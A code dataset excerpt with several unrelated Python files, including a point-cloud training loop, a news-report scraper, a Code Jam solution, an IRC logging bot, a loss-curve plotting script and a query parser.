res_file.create_dataset('confusion_matrix_BP'\n , data=confusion_matrix_BP.confusion_matrix, dtype='uint64')\n res_file.create_dataset('n_clusters'\n , data=n_clusters_meter.value()[0], dtype='uint64')\n res_file.close()\n\n return\n\n for epoch in range(args.start_epoch, args.epochs):\n if not args.learned_embeddings:\n break\n print('Epoch {}/{} ({}):'.format(epoch, args.epochs, folder_hierarchy.output_dir))\n\n loss, n_sp = train()\n scheduler.step()\n\n if (epoch + 1) % args.test_nth_epoch == 0: # or epoch+1==args.epochs:\n loss_test, n_clusters_test, ASA_test, BR_test, BP_test = evaluate()\n print(\n '-> Train loss: %1.5f - Test Loss: %1.5f | n_clusters: %5.1f | ASA: %3.2f %% | Test BR: %3.2f %% | BP : %3.2f%%' % (\n loss, loss_test, n_clusters_test, ASA_test, BR_test, BP_test))\n else:\n loss_test, n_clusters_test, ASA_test, BR_test, BP_test = 0, 0, 0, 0, 0\n print('-> Train loss: %1.5f superpoints size : %5.0f' % (loss, n_sp))\n\n stats.append({'epoch': epoch, 'loss': loss, 'loss_test': loss_test, 'n_clusters_test': n_clusters_test,\n 'ASA_test': ASA_test, 'BR_test': BR_test, 'BP_test': BP_test})\n\n with open(os.path.join(folder_hierarchy.output_dir, 'trainlog.json'), 'w') as outfile:\n json.dump(stats, outfile, indent=4)\n\n if epoch % args.save_nth_epoch == 0 or epoch == args.epochs - 1:\n model_name = 'model.pth.tar'\n print(\"Saving model to \" + model_name)\n model_name = 'model.pth.tar'\n torch.save({'epoch': epoch + 1, 'args': args, 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()},\n os.path.join(folder_hierarchy.output_dir, model_name))\n\n if math.isnan(loss): break\n\n evaluate_final()\n\n # ==========================================================================================\n #\n # model = PointNet(num_features=6, num_global_features=7, out_features=4)\n # model.to(device)\n #\n # checkpoint = torch.load(os.path.join(folder_hierarchy.output_dir, 'model.pth.tar'), map_location=device)\n # model.load_state_dict(checkpoint['state_dict'])\n #\n # model.eval()\n #\n # for bidx, (fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n # tqdm(train_loader)):\n # clouds, clouds_global, nei = clouds_data\n # is_transition = is_transition.to(device, non_blocking=True)\n # objects = objects.to(device, non_blocking=True)\n # clouds = clouds.to(device, non_blocking=True)\n # clouds_global = clouds_global.to(device, non_blocking=True)\n #\n # embeddings = model(clouds, clouds_global)\n #\n # diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n #\n # pred_components, pred_in_component = compute_partition(args, embeddings, edg_source, edg_target, diff, xyz)\n #\n # # Map colors to components\n # print(max(pred_in_component))\n # color_map = instances_color_map()\n # pred_components_color = color_map[pred_in_component]\n #\n # cloud = np.concatenate([xyz, pred_components_color * 255], axis=1)\n #\n # # Log statistics\n # wandb.log({'Point Cloud': wandb.Object3D(cloud)})\n #\n # print(f'\\nLogged scan: {fname[0]}')\n #\n # # graph_sp = compute_sp_graph(xyz, 100, pred_in_component, pred_components, labels, 13)\n # #\n # # spg_file = os.path.join(folder_hierarchy.spg_folder, fname[0])\n # #\n # # write_spg(spg_file, graph_sp, pred_components, pred_in_component)\n\n\ndef instances_color_map():\n # make instance colors\n max_inst_id = 100000\n color_map = np.random.uniform(low=0.0, high=1.0, size=(max_inst_id, 3))\n # force zero to a gray-ish color\n color_map[0] = np.full(3, 0.1)\n return 
color_map\n\n\ndef get_s3dis_info():\n # for now, no edge attributes\n return {\n 'classes': 13,\n 'inv_class_map': {0: 'ceiling', 1: 'floor', 2: 'wall', 3: 'column', 4: 'beam', 5: 'window', 6: 'door',\n 7: 'table', 8: 'chair', 9: 'bookcase', 10: 'sofa', 11: 'board', 12: 'clutter'},\n }\n\n\nif __name__ == \"__main__\":\n arguments = parse_args()\n main(arguments)\n","repo_name":"aleskucera/MuVAL","sub_path":"src/superpoints/supervised_partition.py","file_name":"supervised_partition.py","file_ext":"py","file_size_in_byte":28726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44532693418","text":"import requests\nimport re\n\nimport xlsxwriter\nimport pickle, sys\n\nURL = \"http://www.weimar-in.de/01news/01news.php?site={0}&searchstring=&newscat=#01jumpnews\"\n\nREGEX_HEADING = r\"

([\\s\\S]*?)<\\/h2>\"\nREGEX_REPORTS = r\"([\\s\\S]*?)\"\n\n\ndef striphtml(data):\n p = re.compile(r'<.*?>')\n return p.sub('', data)\n\ndef replaceUmlauts(data):\n data = data.replace(\"ä\", \"ä\")\n data = data.replace(\"ö\", \"ö\")\n data = data.replace(\"ü\", \"ü\")\n data = data.replace(\"ß\", \"ß\")\n data = data.replace(\"Ä\", \"Ä\")\n data = data.replace(\"Ö\", \"Ö\")\n data = data.replace(\"Ü\", \"U\")\n\n data = data.replace(\"\\r\", \"\")\n data = data.replace(\"\\n\", \"\")\n\n return data\n\npicklelist = []\n\n\nfor i in range(1, 662):\n r = requests.get(URL.format(i))\n \n heading = re.findall(REGEX_HEADING, r.text)\n reports = re.findall(REGEX_REPORTS, r.text)\n\n try:\n heading = ''.join(e for e in heading[0] if e.isalnum())\n except:\n heading = \"EMPTY\"\n\n for report in reports:\n content = replaceUmlauts(striphtml(report))\n\n pickledict = { \"heading\": heading,\n \"date\": None,\n \"text\": content,\n \"streets\": [],\n \"locations\": [], \n \"confidence\": 0.5\n }\n\n picklelist.append(pickledict)\n\nfd = open(\"raw.pickle\", \"wb\")\npickle.dump(picklelist, fd)\n\n","repo_name":"volzotan/weimar-crime-map","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23594908941","text":"#!/usr/bin/python\n\nimport sys\n\ndef getl():\n\treturn sys.stdin.readline().rstrip()\n\ntext = 'welcome to code jam'\n\ndef find_indexes(s, ch, p=-1, l=None):\n\tif l is None:\n\t\tl = []\n\tpos = s.find(ch, p+1)\n\tif pos == -1:\n\t\treturn l\n\telse:\n\t\tl.append(pos)\n\t\treturn find_indexes(s, ch, pos, l)\n\ndef count(text, m, p=0, n=-1):\n\tl = filter(lambda x: x>n, m[text[p]])\n\tif p == len(text)-1:\n\t\treturn len(l)\n\telse:\n\t\treturn sum(count(text, m, p+1, x) for x in l)\n\nn = int(getl())\n\nfor i in range(n):\n\tline = getl()\n\tline = filter(lambda c: c if c in 'welcomtdja ' else '', line)\n\tm = {}\n\tfor j in 'welcomtdja ':\n\t\tm[j] = find_indexes(line, j)\n\t#m['j'] = filter(lambda x: x>max(m[' ']), m['j'])\n\t#m['a'] = filter(lambda x: x>max(m['j']), m['a'])\n\tprint('Case #{0}: {1}'.format(i+1, str(count(text,m))[-4:].zfill(4)))\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_36/328.py","file_name":"328.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71206497473","text":"from time import strftime\nfrom bs4 import BeautifulSoup\nimport requests\nimport socket\nimport os\n\n''' Assign Program Wide Variables\n'''\nSERVER = 'irc.rizon.net'\nPORT = 6667\nCHANNEL = '#linux'\n\nNICK = 'TheLost'\nUSER = NICK # Change this if you want a different username for your bot than its Nick.\nREALNAME = 'Lost In Potatolation'\nMODE = 0\t# Generally you don't want to change this\n\nMASTER = 'Kalq'\n\nLOG_DIR = 'logs'\n\n''' Establishing Socket Connection\n'''\nircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nircsock.connect((SERVER, PORT))\n\nhandle = ircsock.makefile(mode='rw', buffering=1, encoding='UTF-8', newline='\\r\\n') # makefile function allows us to treat the irc socket as a file from which we can read and write to.\n\ndef log(command, sender, dest = None, params = None, source = None):\n\t''' Designed to log any conversation in all channels the bot is connected to as well as private messages to the bot itself.\n\t'''\n\n\tpath = os.path.join(LOG_DIR, dest) # Defines the path 
where the logs will be saved. dest is defined by the channel the message is posted on, or the bot itself\n\n\t# Creates the log directory if it doesn't already exist\n\tif not os.path.exists(path):\n\t\tos.makedirs(path)\n\n\t# Defines the date and time\n\tdate = strftime('%Y-%m-%d')\n\ttime = strftime('%H:%M:%S')\n\n\t# Defines the variable to which we can append the logs\n\tlog = open(os.path.join(path, date + '.log'), 'a')\n\n\tif command == '/me': # Checks to see if the sender is using the '/me' command in their IRC client. Determined by the handle_ctcp function.\n\t\tprint('[' + time + ']', sender, params, file=log)\n\telif command == 'PRIVMSG':\n\t\tprint('[' + time + ']', sender, '>>>', params, file=log)\n\telif command == 'JOIN':\n\t\tprint('[' + time + '] *', sender, '(', source, ') has joined', dest, file=log)\n\telif command == 'PART':\n\t\tif params is None:\n\t\t\tprint('[' + time + '] *', sender, '(', source, ') has left', dest, file=log)\n\t\telse:\n\t\t\tprint('[' + time + '] *', sender, '(', source, ') has left', dest, '(', params, ')', file=log)\n\n\tlog.close()\n\ndef handle_commands(dest, command):\n\tif command[1:].startswith('def '):\n\t\tsearch = command.split(' ', 1)[1]\n\t\thtml = requests.get('https://www.wordnik.com/words/' + search)\n\t\tsoup = BeautifulSoup(html.text)\n\t\t\n\t\ttry:\n\t\t\tdefinition = soup.abbr.parent.get_text()\n\t\t\tprint('PRIVMSG', dest, ':' + definition, file=handle)\n\t\t\tlog('PRIVMSG', NICK, dest = dest, params = definition)\n\t\texcept:\n\t\t\tprint('PRIVMSG', dest, ':Word Not Found', file=handle)\t\n\n''' The IRC protocol provides for 3 initial commands when connecting to a new server. The PASS command is optional depending on if the irc server is private. The NICK and USER commands are required.\n'''\ndef set_nick(nick):\n\tprint('NICK', nick, file=handle) # Sends the NICK command to the server with the appropriate parameters.\n\ndef connect(nick, user, mode, realname, password = None):\n\tif password:\n\t\tprint('PASS', password, file=handle) # Sends the PASS command if a password is given for connecting to the server.\n\t\n\tset_nick(nick)\n\tprint('USER', user, mode, '* :'+realname, file=handle) # Sends the USER command to the server with the appropriate parameters.\n\ndef join(channel, key = None):\n\tif key is None:\n\t\tprint('JOIN', channel, file=handle)\n\telse:\n\t\tprint('JOIN', channel, key, file=handle) # The JOIN command has an optional parameter depending on whether the channel being connected to requires it.\n\ndef quit(reason = \"Quit\"):\n\t''' The QUIT command exits the server. 
Therefore we close the socket connected to the server\n\t'''\n\n\tprint('QUIT', reason, file=handle)\n\tircsock.close()\n\ndef private_message(to, msg):\n\t''' The PRIVMSG command sends a message to a user or channel that the bot is connected to\n\t'''\n\n\tprint('PRIVMSG', to, ':'+ msg, file=handle)\n\ndef notice(to, msg):\n\t''' The NOTICE command sends a message to a user or channel\n\t'''\n\n\tprint('NOTICE', to, ':'+ msg, file=handle)\n\ndef handle_ctcp(sender, dest, message):\n\t''' This function handles the various CTCP commands used in IRC.\n\t'''\n\n\tmessage = message[1:].strip('\\x01').split(' ', 1) # Strips the message of the hexadecimal CTCP codes and splits them into the command and any potential parameters.\n\n\tif message[0] == 'ACTION': # The '/me' command\n\t\tlog('/me', sender, dest = dest, params = message[1])\n\nconnect(NICK, USER, MODE, REALNAME)\njoin(CHANNEL)\n\nfor line in handle:\n\tline = line.strip() # Strips the line of any excess whitespace or newlines or tabs or what have you.\n\tprint(line)\n\n\tprefix = None\n\tif line[0] == ':': # Almost every command from an irc server will start with a ':'. Notable exceptions are PINGs.\n\t\t(prefix, line) = line[1:].split(' ', 1) # The 'prefix' contains the source of the command. The 'line' is the command and any parameters involved. ie: 'PRIVMSG #channel :Hello World\n\t(command, params) = line.split(' ', 1)\t# Simply splits the command from its parameters, e.g. PRIVMSG, JOIN etc.\n\n\n\tif command == 'PING':\n\t\tprint('PONG', params, file=handle) # Respond to the irc server with an equivalent PONG of the PING they sent.\n\telif command == 'PRIVMSG':\t\t\n\t\tsender = prefix.split('!', 1)[0] # Determines the Nick of the sender via the source in the 'prefix' variable\n\t\t(dest, message) = params.split(' ', 1) # All PRIVMSG commands contain an initial destination (#channel, Nick) and then the message itself\n\t\tif message[0:2] == ':\\x01': # Checks to see if the message starts with a hexadecimal CTCP code. 
Lets the handle_ctcp function deal with its uniqueness.\n\t\t\thandle_ctcp(sender, dest, message)\n\t\telse:\n\t\t\tlog(command, sender, dest = dest, params = message[1:])\n\t\t\tif message[1] == '.':\n\t\t\t\thandle_commands(dest, message[1:])\n\t\n\telif command == 'JOIN':\n\t\t(sender, source) = prefix.split('!', 1)\n\t\tlog(command, sender, dest = params[1:], source = source)\n\t\n\telif command == 'PART':\n\t\t(sender, source) = prefix.split('!', 1)\n\n\t\tif ' ' in params:\n\t\t\t(dest, message) = params.split(' ', 1)\n\t\t\tlog(command, sender, dest = dest, params = message[1:], source = source)\n\t\telse:\n\t\t\tlog(command, sender, dest = params, source = source)\n\n\t\n","repo_name":"Basrandir/thelost","sub_path":"theLost.py","file_name":"theLost.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"20564263487","text":"import os.path as osp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport re\n\nCKPT_PATH5 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/mlp/mlp_bot-13-512-256-64_top-512-512-256-1_baseline3.log\"\nCKPT_PATH4 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_zeroAttn.log\"\nCKPT_PATH3 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_noSparse.log\"\nCKPT_PATH2 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_halfPrune.log\"\nCKPT_PATH1 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_baseline2.log\"\n# lossMsg = np.empty(shape=[2,0])\n\n\ndef load_message(fileName):\n loss_pattern = re.compile(r\"loss (\\d+\\.\\d+)\")\n accuracy_pattern = re.compile(r\"AUC (\\d+\\.\\d+)\")\n\n count = 0\n with open(fileName, 'r') as f:\n fileMsg = f.read()\n loss_values = [float(match) for match in re.findall(loss_pattern, fileMsg)]\n accuracy_values = [float(match) for match in re.findall(accuracy_pattern, fileMsg)]\n \n return loss_values, accuracy_values\n\ndef draw_curve(loss_values, accuracy_values, outFilePath:str = \"./plot.png\"):\n # Create a figure with two y-axes\n fig, ax1 = plt.subplots()\n\n # Plot loss curve on the first y-axis\n loss_step = np.arange(512, (len(loss_values) + 1)*512, 512)\n ax1.plot(loss_step, loss_values, 'r-', label='Loss')\n ax1.set_xlabel('Iterations')\n ax1.set_ylabel('Loss')\n ax1.set_ylim(0.12,0.16)\n ax1.tick_params('y', colors='r')\n ax1.grid(True)\n\n # Create a second y-axis\n ax2 = ax1.twinx()\n\n # Plot accuracy curve on the second y-axis\n accuracy_step = np.arange(len(loss_values)/len(accuracy_values)*512, (len(loss_values) + 1)*512, (len(loss_values)/len(accuracy_values))*512)\n ax2.plot(accuracy_step, accuracy_values, 'b-', label='AUC')\n ax2.set_ylabel('AUC')\n ax2.tick_params('both', colors='b')\n\n # Add legend\n lines = [ax1.get_lines()[0], ax2.get_lines()[0]]\n ax1.legend(lines, [line.get_label() for line in lines], loc='lower right')\n\n # Title the plot after the output filename (CKPT_PATH was never defined) and save it\n plt.title(outFilePath.split('/')[-1][:-4])\n plt.savefig(outFilePath)\n\n\ndef draw_singleY(data1, data2, data3, data4, data5, outFilePath:str = \"./plot.png\"):\n fig, ax1 = plt.subplots()\n\n # Plot loss curve on the first y-axis\n loss_step1 = np.arange(512, (len(data1) + 1)*512, 512)\n loss_step2 = np.arange(512, (len(data2) + 1)*512, 512)\n loss_step3 = np.arange(512, (len(data3) + 1)*512, 512)\n 
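# The x-axis assumes one logged loss value every 512 training iterations (inferred from the arange stride used throughout this script, not verified against the logs).\n 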
loss_step4 = np.arange(512, (len(data4) + 1)*512, 512)\n loss_step5 = np.arange(512, (len(data5) + 1)*512, 512)\n\n ax1.plot(loss_step1, data1, 'r-', label='attn>0.1')\n ax1.plot(loss_step2, data2, 'b-', label='attn>mean(abs(attn)))')\n ax1.plot(loss_step3, data3, 'y-', label='no sparse')\n ax1.plot(loss_step4, data4, 'm-', label='const attn')\n ax1.plot(loss_step5, data5, 'g-', label='dot')\n\n ax1.set_xlabel('Step')\n ax1.set_ylabel('Loss')\n # ax1.set_ylim(0.60,0.75)\n ax1.set_ylim(0.12,0.16)\n ax1.tick_params('y', colors='r')\n ax1.grid(True)\n # Add legend\n lines = [ax1.get_lines()[0], ax1.get_lines()[1],ax1.get_lines()[2],ax1.get_lines()[3],ax1.get_lines()[4]]\n ax1.legend(lines, [line.get_label() for line in lines], loc='lower right')\n\n # Save the plot as PDF\n # plt.title(CKPT_PATH.split('/')[-1][:-4])\n plt.savefig(outFilePath)\n\nloss_values1, AUC_values1 = load_message(CKPT_PATH1)\nloss_values2, AUC_values2 = load_message(CKPT_PATH2)\nloss_values3, AUC_values3 = load_message(CKPT_PATH3)\nloss_values4, AUC_values4 = load_message(CKPT_PATH4)\nloss_values5, AUC_values5 = load_message(CKPT_PATH5)\n# draw_curve(loss_values, accuracy_values)\n# draw_singleY(AUC_values1, AUC_values2, AUC_values3, AUC_values4, AUC_values5, \"./AUC.png\")\ndraw_singleY(loss_values1, loss_values2, loss_values3, loss_values4,loss_values5, \"./loss.png\")","repo_name":"coco-alen/dlrm","sub_path":"draw_lossAccy.py","file_name":"draw_lossAccy.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"38523712106","text":"import re\nimport ast\n\ndef get_new_key(prefix, substr, done):\n\t\n\tkey = \"_%s1_\" % (prefix)\n\tn = 1\n\twhile (key in done) or (key in substr):\n\t\tn += 1\n\t\tkey = \"_%s%d_\" % (prefix, n)\n\treturn key\n\ndef add_bracketed(clsname, descrname, prefix, substr, bracketed, lookup):\n\t\n\tif isinstance(clsname, str):\n\t\tclsname = clsname.strip(\"[]\")\n\t\n\tif (clsname, descrname) in lookup:\n\t\tkey = lookup[(clsname, descrname)]\n\telse:\n\t\tkey = get_new_key(prefix, substr, bracketed)\n\t\tbracketed[key] = (clsname, descrname)\n\t\tlookup[(clsname, descrname)] = key\n\t\n\treturn key\n\ndef str_to_key(substr):\n\t\n\tsubstr = tuple(substr.split(\".\"))\n\tif len(substr) == 1:\n\t\treturn (substr[0], None)\n\treturn substr\n\ndef remove_quoted(substr):\n\t# returns substr, quoted = {key: quoted substr, ...}\n\t\n\tquoted = {}\n\twhile True:\n\t\tfound = False\n\t\tfor m in re.finditer(r\"(['\\\"])(.*?)\\1\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tkey = get_new_key(\"QU\", substr, quoted)\n\t\t\tquoted[key] = substr[i:j]\n\t\t\tsubstr = substr[:i] + \" %s \" % (key) + substr[j:]\n\t\t\tfound = True\n\t\t\tbreak\n\t\tif not found:\n\t\t\tbreak\n\t\n\treturn substr, quoted\n\ndef remove_bracketed_selects(substr, classes, descriptors):\n\t# returns substr, bracketed = {key: (class, descriptor), ...}\n\t\n\tdef process_found(substr_cleaned, i, j, names):\n\t\t\n\t\tif substr_cleaned[:i].endswith(\"*.\"):\n\t\t\tnames.append([i-2, i-1, \"*\", False])\n\t\t\tsubstr_cleaned = substr_cleaned[:i-2] + \" \" + substr_cleaned[i-1:]\n\t\tif substr_cleaned[j:].startswith(\".*\"):\n\t\t\tnames.append([j+1, j+2, \"*\", False])\n\t\t\tsubstr_cleaned = substr_cleaned[:j+1] + \" \" + substr_cleaned[j+2:]\n\t\t\n\t\treturn substr_cleaned\n\t\n\tbracketed = {}\n\tdone = {}\n\t\n\tsubstr_cleaned = substr\n\tnames = [] # [[i, j, text, is_bracketed], ...]\n\t\n\tfor m in re.finditer(r\"OBJ+\\(.*?\\)\", 
substr_cleaned):\n\t\ti, j = m.start(0), m.end(0)\n\t\tids = [id_.strip() for id_ in substr_cleaned[i+4:j-1].split(\",\")]\n\t\tif not False in [id_.isdigit() for id_ in ids]:\n\t\t\tnames.append([i, j, tuple([int(id_) for id_ in ids]), True])\n\t\t\tsubstr_cleaned = substr_cleaned[:i] + (j-i)*\" \" + substr_cleaned[j:]\n\t\t\tsubstr_cleaned = process_found(substr_cleaned, i, j, names)\n\t\n\tfor clsname in sorted(list(classes), key = lambda name: len(name))[::-1]:\n\t\tfor m in re.finditer(r\"(\\A|[^a-zA-Z0-9_])(%s)([^a-zA-Z0-9_]|\\Z)\" % (clsname), substr_cleaned):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tfound = False\n\t\t\tif (substr_cleaned[i] == \"[\") and (substr_cleaned[j-1] == \"]\"):\n\t\t\t\tnames.append([i, j, substr_cleaned[i:j], True])\n\t\t\t\tsubstr_cleaned = substr_cleaned[:i] + (j-i)*\" \" + substr_cleaned[j:]\n\t\t\t\tfound = True\n\t\t\telse:\n\t\t\t\tif substr_cleaned[i:].startswith(clsname):\n\t\t\t\t\ti -= 1\n\t\t\t\tif substr_cleaned[:j].endswith(clsname):\n\t\t\t\t\tj += 1\n\t\t\t\tif substr_cleaned[i+1:j-1].isidentifier():\n\t\t\t\t\ti += 1\n\t\t\t\t\tj -= 1\n\t\t\t\t\tnames.append([i, j, substr_cleaned[i:j], False])\n\t\t\t\t\tsubstr_cleaned = substr_cleaned[:i] + len(substr_cleaned[i:j])*\" \" + substr_cleaned[j:]\n\t\t\t\t\tfound = True\n\t\t\tif found:\n\t\t\t\tsubstr_cleaned = process_found(substr_cleaned, i, j, names)\n\t\n\tfragments = [] # [[text, is_class, is_bracketed], ...]\n\tj_last = 0\n\tfor i, j, name, is_bracketed in sorted(names, key = lambda row: row[0]):\n\t\tif i > j_last:\n\t\t\tfragments.append([substr_cleaned[j_last:i], False, False])\n\t\tfragments.append([name, True, is_bracketed])\n\t\tj_last = j\n\tif j_last < len(substr_cleaned):\n\t\tfragments.append([substr_cleaned[j_last:], False, False])\n\t\n\tcheckstr = \"\"\n\tfor text, is_class, _ in fragments:\n\t\tif is_class:\n\t\t\tcheckstr += \"C\"\n\t\telif text == \".\":\n\t\t\tcheckstr += \".\"\n\t\telse:\n\t\t\tcheckstr += \"X\"\n\t\n\tdescriptors = descriptors.union({\"*\"})\n\t\n\tcollect = []\n\twhile fragments:\n\t\tif checkstr.startswith(\"C.C.C\"):\n\t\t\t# not a SELECT (probably a relation)\n\t\t\tfor i in range(5):\n\t\t\t\ttext, _, _ = fragments.pop(0)\n\t\t\t\tcollect.append(text)\n\t\t\tcheckstr = checkstr[5:]\n\t\telif checkstr.startswith(\"C.C\"):\n\t\t\tclsname, descrname = fragments[0][0], fragments[2][0].strip(\"[]\")\n\t\t\tclsname = clsname.strip(\"[]\") if isinstance(clsname, str) else clsname\n\t\t\tif (descrname in descriptors) and (fragments[0][2] or fragments[2][2]):\n\t\t\t\t# second class is a descriptor and one of them is bracketed\n\t\t\t\tkey = add_bracketed(clsname, descrname, \"VAR\", substr, bracketed, done)\n\t\t\t\tcollect += \" %s \" % (key)\n\t\t\telse:\n\t\t\t\tcollect += [text for text, _, _ in fragments[:3]]\n\t\t\tfragments = fragments[3:]\n\t\t\tcheckstr = checkstr[3:]\n\t\telif checkstr.startswith(\"CX\") and fragments[1][0].strip().startswith(\".\"):\n\t\t\tcollect += [text for text, _, _ in fragments[:3]]\n\t\t\tfragments = fragments[3:]\n\t\t\tcheckstr = checkstr[3:]\n\t\telif checkstr.startswith(\"C\") and fragments[0][2]:\n\t\t\t# bracketed class without a descriptor\n\t\t\tkey = add_bracketed(fragments[0][0], None, \"VAR\", substr, bracketed, done)\n\t\t\tcollect += \" %s \" % (key)\n\t\t\tfragments = fragments[1:]\n\t\t\tcheckstr = checkstr[1:]\n\t\telse:\n\t\t\ttext, _, _ = fragments.pop(0)\n\t\t\tcollect.append(text)\n\t\t\tcheckstr = checkstr[1:]\n\tcollect = [\"OBJ(%s)\" % (\",\".join([str(id_) for id_ in item])) if isinstance(item, 
tuple) else item for item in collect]\n\tsubstr = \"\".join(collect)\n\t\n\treturn substr, bracketed\n\ndef remove_classless(substr, classes):\n\t\n\tclassless = set()\n\twhile True:\n\t\tfound = False\n\t\tfor m in re.finditer(\"\\!\\*\\.\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tkey = get_new_key(\"CL\", substr, classless.union(classes))\n\t\t\tclassless.add(key)\n\t\t\tsubstr = substr[:i] + key + substr[j-1:]\n\t\t\tfound = True\n\t\t\tbreak\n\t\tif not found:\n\t\t\tbreak\n\t\n\treturn substr, classless\n\ndef remove_bracketed_all(substr):\n\t# returns substr, bracketed = {key: bracketed substr, ...}\n\t\n\tbracketed = {}\n\twhile True:\n\t\tfound = False\n\t\tfor m in re.finditer(r\"OBJ+\\(.*?\\)\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tids = [id_.strip() for id_ in substr[i+4:j-1].split(\",\")]\n\t\t\tif not False in [id_.isdigit() for id_ in ids]:\n\t\t\t\tkey = get_new_key(\"BA\", substr, bracketed)\n\t\t\t\tbracketed[key] = tuple([int(id_) for id_ in ids])\n\t\t\t\tsubstr = substr[:i] + key + substr[j:]\n\t\t\t\tfound = True\n\t\t\t\tbreak\n\t\tfor m in re.finditer(r\"\\[.*?\\]\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tkey = get_new_key(\"BA\", substr, bracketed)\n\t\t\tbracketed[key] = substr[i:j]\n\t\t\tsubstr = substr[:i] + key + substr[j:]\n\t\t\tfound = True\n\t\t\tbreak\n\t\tif not found:\n\t\t\tbreak\n\t\n\treturn substr, bracketed\n\ndef replace_bracketed(substr, bracketed):\n\t\n\tfor key in bracketed:\n\t\tdata = bracketed[key]\n\t\tif isinstance(data, tuple):\n\t\t\tdata = \"OBJ(%s)\" % (\",\".join([str(obj_id) for obj_id in data]))\n\t\tsubstr = substr.replace(key, data)\n\treturn substr\n\nclass SelectsToVarsTransformer1(ast.NodeTransformer):\n\t\n\tdef __init__(self, substr, classes, descriptors, bracketed_selects):\n\t\t# classes = {class_name, ...}\n\t\t# descriptors = {descriptor_name, ...}\n\t\t# bracketed_selects = {key: (class, descriptor), ...}\n\t\t\n\t\tast.NodeTransformer.__init__(self)\n\t\t\n\t\tself._done = {} # {(class_name, descriptor_name): variable_name, ...}\n\t\tself.selects = bracketed_selects # {key: (class, descriptor), ...}\n\t\t\n\t\tself._substr = substr\n\t\tself._classes = classes\n\t\tself._descriptors = descriptors\n\t\t\n\t\tfor name in self.selects:\n\t\t\tkey = self.selects[name]\n\t\t\tself._done[key] = name\n\t\n\tdef visit_Attribute(self, node):\n\t\t\n\t\tself.generic_visit(node)\n\t\t\n\t\tif (type(node.value) is ast.Name) and \\\n\t\t\t(node.value.id not in __builtins__) and \\\n\t\t\t(node.value.id in self._classes) and \\\n\t\t\t(node.attr not in __builtins__) and \\\n\t\t\t(node.attr in self._descriptors):\n\t\t\t\tname = add_bracketed(node.value.id, node.attr, \"VAR\", self._substr, self.selects, self._done)\n\t\t\t\treturn ast.Name(id = name, ctx = node.ctx)\n\t\t\n\t\treturn node\n\nclass SelectsToVarsTransformer2(SelectsToVarsTransformer1):\n\t\n\tdef visit_Name(self, node):\n\t\t\n\t\tname = node.id\n\t\tif (name not in __builtins__) and (name in self._classes):\n\t\t\tname = add_bracketed(name, None, \"VAR\", self._substr, self.selects, self._done)\n\t\t\n\t\treturn ast.Name(id = name, ctx = node.ctx)\n\t\n\tdef visit_Attribute(self, node):\n\t\t\n\t\treturn node\n\ndef extract_expr_vars(substr, classes, descriptors, bracketed_selects):\n\t# classes = {name, ...}\n\t# descriptors = {name, ...}\n\t# bracketed_selects = {key: (class, descriptor), ...}\n\t\n\tsubstr, classless = remove_classless(substr, classes)\n\t\n\ttree = ast.parse(substr)\n\t# find and replace Class.Descriptor 
occurences in substr\n\ttransformer = SelectsToVarsTransformer1(substr, classes.union(classless), descriptors, bracketed_selects)\n\ttree = transformer.visit(tree)\n\t# find and replace Class occurences in substr\n\ttransformer = SelectsToVarsTransformer2(substr, classes.union(classless), descriptors, bracketed_selects)\n\ttree = transformer.visit(tree)\n\texpr = ast.unparse(tree)\n\tvars = transformer.selects.copy()\n\t\n\tfor name in vars:\n\t\tif vars[name][0] in classless:\n\t\t\tcls, descr = vars[name]\n\t\t\tvars[name] = (\"!*\", descr)\n\t\n\treturn expr, vars\n\n\nclass Parse(object):\n\t\n\tKEYWORDS = [\"SELECT\", \"COUNT\", \"SUM\", \"AS\", \"RELATED\", \"WHERE\", \"GROUP BY\"]\n\n\tdef __init__(self, querystr, classes, descriptors):\n\t\t# classes = {name, ...}\n\t\t# descriptors = {name, ...}\n\t\t# querystr = \"SELECT [select1], [select2], COUNT([select1]) AS [alias], SUM([select1]) AS [alias], ... RELATED [relation1], [relation2], ... WHERE [conditions expression] GROUP BY [select1], [select2], ...\"\n\t\t#\tselect = Class or Class.Descriptor\n\t\t#\trelation = Class1.Relation.Class2\n\t\t#\tconditions = python expression; e.g. Class.Descriptor > 3 or Class is not None\n\t\t#\tuse [name with spaces] to escape class, descriptor, relation or alias names containing spaces or KEYWORDS\n\t\t\n\t\tself.querystr = querystr\n\t\tself.classes = classes\n\t\tself.descriptors = descriptors\n\t\t\n\t\tself.columns = [] # [(class_name, descriptor_name), (None, alias), ...]\n\t\tself.selects = [] # [(class_name, descriptor_name), ...]\n\t\tself.group_by = [] # [(class_name, descriptor_name), ...]\n\t\tself.counts = [] # [(alias, class_name, descriptor_name), 